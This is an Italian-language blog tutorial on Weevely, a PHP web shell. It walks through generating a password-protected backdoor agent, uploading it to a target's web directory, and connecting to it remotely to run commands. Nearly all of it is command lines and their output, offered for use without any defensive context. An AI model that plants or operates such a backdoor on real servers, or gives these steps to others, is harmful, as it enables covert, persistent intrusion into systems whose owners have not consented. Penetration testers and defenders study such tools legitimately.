Una backdoor PHP con Weevely

Posted by Cariomax on April 07, 2020

Intro

Weevely è una shell Web PHP invisibile che simula connessioni simili a quelle di Telnet. È uno strumento essenziale per lo sfruttamento post applicazioni Web e può essere utilizzato come backdoor invisibile o come shell Web per gestire account Web legittimi.

Weevely HomePage

Print usage

Il Client Weevely comunica con l'agente PHP installato nella destinazione. Andate alla cartella weevely3 / ed eseguite ./weevely.py per stampare la schermata di aiuto

$ ./weevely.py

[+] weevely 4.0.0

[!] Error: too few arguments

[+] Run terminal to the target weevely

[+] Load session file weevely session

[+] Generate backdoor agent weevely generate

Generare il backdoor Agent

Per generare un nuovo agente, basta usare l'opzione generate passando gli argomenti password e path completo.

$ ./weevely.py generate mypassword agent.php

Generated backdoor with password 'mypassword' in 'agent.php' of 671 byte size.

Upload dell' Agent

Carica l'agente generato nella cartella web di destinazione. Assicurati che l'URL dell'agente sia raggiungibile dalla tua posizione e che sia eseguito correttamente dal server web come codice PHP.

Connessione all'Agent

Lanciamo ora lo script Weevely per connettersi in remoto alla nostra backdoor generata

$ ./weevely.py http://target/agent.php mypassword

Lancia un comando per verificarne la connessione remota avvenuta

weevely> uname -a

weevely> Linux ubuntu 3.2.0-65-generic 99-Ubuntu SMP Fri Jul 4 21:04:27 UTC 2014 i686 i686 i386 GNU/Linux